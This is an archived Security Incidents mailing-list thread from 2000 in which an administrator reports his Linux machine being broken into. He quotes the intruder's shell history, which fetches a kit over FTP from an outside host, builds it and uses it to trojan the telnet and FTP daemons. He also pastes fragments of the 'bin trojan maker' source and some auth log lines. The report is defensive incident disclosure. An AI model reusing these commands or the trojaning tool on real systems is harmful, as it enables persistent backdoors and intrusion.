Security Incidents mailing list archives

Previous By Date Next
Previous By Thread Next

Re: succesful crack

From: icon94 () HOTMAIL COM (icon xxeti)
Date: Thu, 17 Feb 2000 22:09:03 GMT

Welcome to the club.
Some sort of trend going on here


From: Bob Lockie <bjlockie () NORTELNETWORKS COM>
Reply-To: Bob Lockie <bjlockie () nortelnetworks com>
To: INCIDENTS () SECURITYFOCUS COM
Subject: succesful crack
Date: Tue, 15 Feb 2000 14:59:24 -0500

rjlockie () home net

(613) 765-5409


My box (24.112.89.219) was cracked.

The attack originated from  24.11.98.152 (c505000-a.blfld1.ct.home.com).

It could be this machine was also cracked and it was used as a launching
point.
Please contact the owner and have a talk with them.
The owner should definitely not offer anonymous ftp service.

A few things were left on my system.

drwxr-xr-x   2 root     root         1024 Feb 13 22:03 ADMROCKS

I have no /etc/host.allow or /etc/hosts.deny files anymore.

This was in /tmp/,bash_history.

ftp 24.11.98.152
tar -xvf btm.tar
make
./btm /usr/sbin/in.telnetd
./btm /usr/sbin/in.ftpd
rm -rf btm.tar

The following source:

/* bin trojan maker */

#include "btm.h"

#define BTM_VER "btm v1.5"


int options=0;

void usage(char* progname)
{
  printf("usage: %s [-d] [-D define line] [-c] [-l max] [-v] [-u
compiler]"
                " [-o compiler options] target [trojan
source]\n",progname);
  printf("in trojan source, the trojan function must be:\n");
  printf("  "TROJAN_FCT"(char** argv,char** envp)\n");
  printf("\n");
  printf("-d: debug mode\n");
  printf("-c: don't trojan, just put the C file on stdout\n");
  printf("-l max: max number of char in a line of the C file\n");
  printf("-v: display version\n");
  printf("-u compiler: use this compiler\n");
  printf("-o options: options for compiler\n");
  printf("-n: no save for target file\n");
  printf("-e: echo commands\n");
  printf("-m comments: put comments in btmized file\n");
  printf("\n");
  exit(0);
}


int getdirname(char* dirname,char* filename,size_t dirname_size)
{

  if (!filename) return -1;

  if (filename[0]=='/') {
    strncpy(dirname,filename,dirname_size);
    *(((char*)strrchr(dirname,'/'))+1)=0;
  }
  else {
    if (!getcwd(dirname,dirname_size)) {
      perror("getcwd");
      return -1;
    }
  }

  return 0;
}


/var/log/secure
Feb 14 01:04:23 gw PAM_pwdb[6868]: (login) session opened for user tek by
(uid=0
)
Feb 14 01:04:25 gw PAM_pwdb[6883]: (su) session opened for user own by
tek(uid=5
000)



Bob Lockie
bjlockie () nortelnetworks com

Live long and prosper.


______________________________________________________
Get Your Private, Free Email at http://www.hotmail.com
Previous By Date Next
Previous By Thread Next

Current thread: